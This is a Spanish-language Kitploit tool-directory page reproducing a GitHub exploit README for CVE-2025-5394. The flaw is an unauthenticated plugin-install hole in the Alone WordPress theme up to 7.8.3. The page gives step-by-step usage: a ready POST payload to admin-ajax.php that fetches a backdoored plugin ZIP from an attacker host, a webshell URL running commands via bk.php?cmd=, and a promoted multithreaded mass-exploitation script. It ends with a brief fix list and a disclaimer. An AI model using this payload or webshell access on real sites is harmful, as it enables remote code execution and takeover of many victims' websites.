Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-5394 — Alone – Tema WordPress multipropósito para organizaciones benéficas sin fines de lucro <= 7.8.3 - Falta de autorización que permite subida arbitraria de archivos no autenticada a través de la instalación de plugins. | Kitploit
Herramientas/GitHubGitHub/yucaerin/cve-2025-5394
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubyucaerin/cve-2025-5394

CVE-2025-5394

Alone – Tema WordPress multipropósito para organizaciones benéficas sin fines de lucro <= 7.8.3 - Falta de autorización que permite subida arbitraria de archivos no autenticada a través de la instalación de plugins.

Ver Repositorio
131hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-5394 – Tema Alone de WordPress <= 7.8.3 - Carga Arbitraria de Archivos No Autenticada mediante Instalación de Plugins

🔥 Resumen de la Vulnerabilidad
El tema de WordPress Alone versiones <= 7.8.3 es vulnerable a una vulnerabilidad de carga arbitraria de archivos no autenticada. Esta falla permite a atacantes no autenticados cargar e instalar archivos ZIP de plugins arbitrarios desde URLs remotas a través de un endpoint AJAX desprotegido, lo que resulta en ejecución remota de código (RCE) mediante la implementación de plugins con puerta trasera.

Esta vulnerabilidad se origina en la función beplus_import_pack_install_plugin expuesta al público a través de wp_ajax_nopriv_ sin ninguna verificación de autenticación o capacidad. La función instala y activa un plugin desde una URL proporcionada por el usuario.

🔍 Tema Afectado

  • Nombre del Tema: Alone – Tema WordPress de Caridad Multipropósito sin Fines de Lucro
  • Versión Afectada: <= 7.8.3
  • Tipo de Vulnerabilidad: Carga Arbitraria de Archivos No Autenticada → RCE
  • CVE ID: CVE-2025-5394
  • Puntuación CVSS: 9.8 (Crítica)
  • Impacto: Ejecución remota de código completa (RCE) y compromiso total del sitio

🧪 Características del Exploit

  • 🔓 No requiere autenticación
  • 📦 Carga un ZIP de plugin malicioso directamente desde una URL remota
  • 🚀 Instala y activa automáticamente el plugin
  • 🐚 Entrega de webshell compatible mediante PHP incrustado en el plugin
  • ✅ Endpoint AJAX accesible por usuarios no autenticados: /wp-admin/admin-ajax.php?action=beplus_import_pack_install_plugin

🧠 Investigador

  • Crédito: Thai An

🚀 Uso

  1. Prepare un archivo ZIP de plugin malicioso alojado en un servidor que usted controle.

    • Debe contener un encabezado de plugin válido (Plugin Name:) y una puerta trasera PHP (por ejemplo, bk.php)
  2. Prepare la siguiente solicitud POST:

    root@kitploit:~
    POST /wp-admin/admin-ajax.php HTTP/1.1
    Host: victim.com
    Content-Type: application/x-www-form-urlencoded
    
    action=beplus_import_pack_install_plugin&
    data[plugin_slug]=hello-dolly&
    data[plugin_source]=https://attacker.com/hello-dolly.zip
    
  3. Si tiene éxito, el plugin se instala y activa. Acceda a su shell en:

    root@kitploit:~
    https://victim.com/wp-content/plugins/hello-dolly/bk.php?cmd=id
    

🧰 Script de Explotación Masiva Este repositorio incluye una herramienta de explotación masiva con:

  • Procesamiento multihilo
  • Prefijo HTTPS automático (si falta)
  • Registro en vivo de objetivos exitosos en result.txt

Consulte mass_beplus_exploit.py para más detalles.

🛠 Recomendaciones de Corrección

  • Los autores del tema deben eliminar o asegurar el hook wp_ajax_nopriv_beplus_import_pack_install_plugin.
  • Implementar comprobaciones de autenticación/capacidad (por ejemplo, current_user_can('install_plugins'))
  • Validar y restringir las fuentes de plugins.
  • Utilice un Firewall de Aplicaciones Web (WAF) para bloquear el acceso no autorizado a admin-ajax.

🔒 Descargo de responsabilidad:
Esta información se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas. El acceso o uso no autorizado de sistemas informáticos es ilegal y poco ético.

📚 Referencia:

  • Aviso de Wordfence – CVE-2025-5394

CVE: CVE-2025-5394
Investigador: Thai An

Descargar herramienta